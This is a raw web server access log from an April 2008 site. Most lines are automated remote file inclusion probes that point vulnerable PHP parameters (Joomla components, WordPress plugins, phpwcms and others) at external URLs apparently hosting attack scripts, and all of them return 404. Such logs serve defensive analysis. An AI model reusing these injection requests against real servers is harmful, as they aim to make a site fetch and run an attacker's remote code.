64.72.119.130 - - [06/Apr/2008:19:52:54 -0700] "GET /samplefaqsupport.php?path[docroot]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:52:54 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.30.226.156 - - [06/Apr/2008:19:52:59 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:53:26 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:53:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:19:53:26 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:53:37 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:53:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:53:38 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:53:46 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:53:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.67.38 - - [06/Apr/2008:19:53:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.84.7.82 - - [06/Apr/2008:19:56:21 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:58:53 -0700] "GET /logs/access_080303.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:58:53 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:58:53 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.232.102.34 - - [06/Apr/2008:19:58:55 -0700] "GET /logs/access_080225.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gatesofzion.net/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:20:00:26 -0700] "GET /logs/access_080204.log//projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:20:00:27 -0700] "GET //projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:20:00:27 -0700] "GET /logs//projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:00:31 -0700] "GET /logs/access_080303.log/samplefaqsupport.php?path[docroot]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
63.247.140.59 - - [06/Apr/2008:20:01:17 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
63.247.140.59 - - [06/Apr/2008:20:01:17 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
63.247.140.59 - - [06/Apr/2008:20:01:18 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:01:31 -0700] "GET //common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.93.107.242 - - [06/Apr/2008:20:02:53 -0700] "GET //skin/zero_vote/error.php?dir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
69.93.107.242 - - [06/Apr/2008:20:02:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
193.23.172.8 - - [06/Apr/2008:20:04:53 -0700] "GET /logs/access_071112.log/index.php?page=http://www.cgd-k25.org/forum//includes/error/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
193.23.172.8 - - [06/Apr/2008:20:04:53 -0700] "GET /index.php?page=http://www.cgd-k25.org/forum//includes/error/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
193.23.172.8 - - [06/Apr/2008:20:04:53 -0700] "GET /logs/index.php?page=http://www.cgd-k25.org/forum//includes/error/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
193.23.172.8 - - [06/Apr/2008:20:05:06 -0700] "GET /logs/access_071105.log/index.php?page=http://www.cgd-k25.org/forum//includes/error/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:20:06:50 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:20:06:50 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:20:06:50 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.72.221.90 - - [06/Apr/2008:20:06:53 -0700] "GET /logs/access_080204.log/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.72.221.90 - - [06/Apr/2008:20:06:58 -0700] "GET /logs/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.72.221.90 - - [06/Apr/2008:20:07:32 -0700] "GET /logs/access_080225.log/components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:20:07:43 -0700] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:20:07:43 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:20:07:43 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:10:04 -0700] "GET /logs/access_080225.log/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:10:05 -0700] "GET /header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:10:05 -0700] "GET /logs/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
70.84.7.82 - - [06/Apr/2008:20:10:18 -0700] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.84.7.82 - - [06/Apr/2008:20:10:18 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.195.37.125 - - [06/Apr/2008:20:10:43 -0700] "GET /sitebuilder/ HTTP/1.0" 200 520 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
72.18.192.224 - - [06/Apr/2008:20:11:00 -0700] "GET /logs/access_080225.log//admin/business_inc/saveserver.php?thisdir=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:20:11:13 -0700] "GET /logs/access_080225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:20:11:23 -0700] "GET /logs/access_080225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:20:11:23 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:20:11:23 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:20:11:27 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:11:29 -0700] "GET /logs/access_080224.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:11:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:11:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:13:06 -0700] "GET /logs/access_080225.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:13:06 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:13:07 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.6.18.244 - - [06/Apr/2008:20:13:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.23.169 - - [06/Apr/2008:20:13:09 -0700] "GET /logs/access_071126.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:20:13:23 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
67.195.37.125 - - [06/Apr/2008:20:13:24 -0700] "GET /?M=A HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:13:27 -0700] "GET /logs/access_080225.log//Neos_Chronos/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:13:27 -0700] "GET //Neos_Chronos/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:13:27 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:13:39 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.195.37.125 - - [06/Apr/2008:20:13:42 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:20:13:56 -0700] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:14:42 -0700] "GET //projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:14:56 -0700] "GET /logs/access_080121.log//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:14:56 -0700] "GET /logs//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:15:02 -0700] "GET /logs/access_080204.log//common/db.php?commonpath=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
70.86.152.130 - - [06/Apr/2008:20:15:26 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
70.86.152.130 - - [06/Apr/2008:20:15:26 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
195.74.65.15 - - [06/Apr/2008:20:15:49 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.74.65.15 - - [06/Apr/2008:20:15:49 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
89.111.176.28 - - [06/Apr/2008:20:15:54 -0700] "GET /logs/access_080128.log//projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
70.84.7.82 - - [06/Apr/2008:20:16:32 -0700] "GET /logs/access_080211.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.72.119.130 - - [06/Apr/2008:20:16:51 -0700] "GET /logs/access_071112.log//Neos_Chronos/header.php?base_folder=http://yoga0400.org/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
70.86.152.130 - - [06/Apr/2008:20:22:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
70.86.152.130 - - [06/Apr/2008:20:22:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:22:16 -0700] "GET //advguestbook//admin.php?include_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.7.194 - - [06/Apr/2008:20:22:54 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pingstlse.mine.nu//images/gif/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
87.230.7.194 - - [06/Apr/2008:20:22:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pingstlse.mine.nu//images/gif/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:20:24:30 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:24:49 -0700] "GET /logs/access_071119.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:24:49 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:24:50 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:25:52 -0700] "GET /logs/access_080224.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:25:52 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:25:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:26:04 -0700] "GET /logs/access_080127.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:26:05 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:26:05 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.232.64.122 - - [06/Apr/2008:20:26:29 -0700] "GET /logs/access.log//includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.232.64.122 - - [06/Apr/2008:20:26:29 -0700] "GET //includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.232.64.122 - - [06/Apr/2008:20:26:29 -0700] "GET /logs//includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:26:50 -0700] "GET /logs/scripts.log/admin.php?include_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:26:51 -0700] "GET /admin.php?include_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:26:51 -0700] "GET /logs/access_080107.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:26:51 -0700] "GET /logs/admin.php?include_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
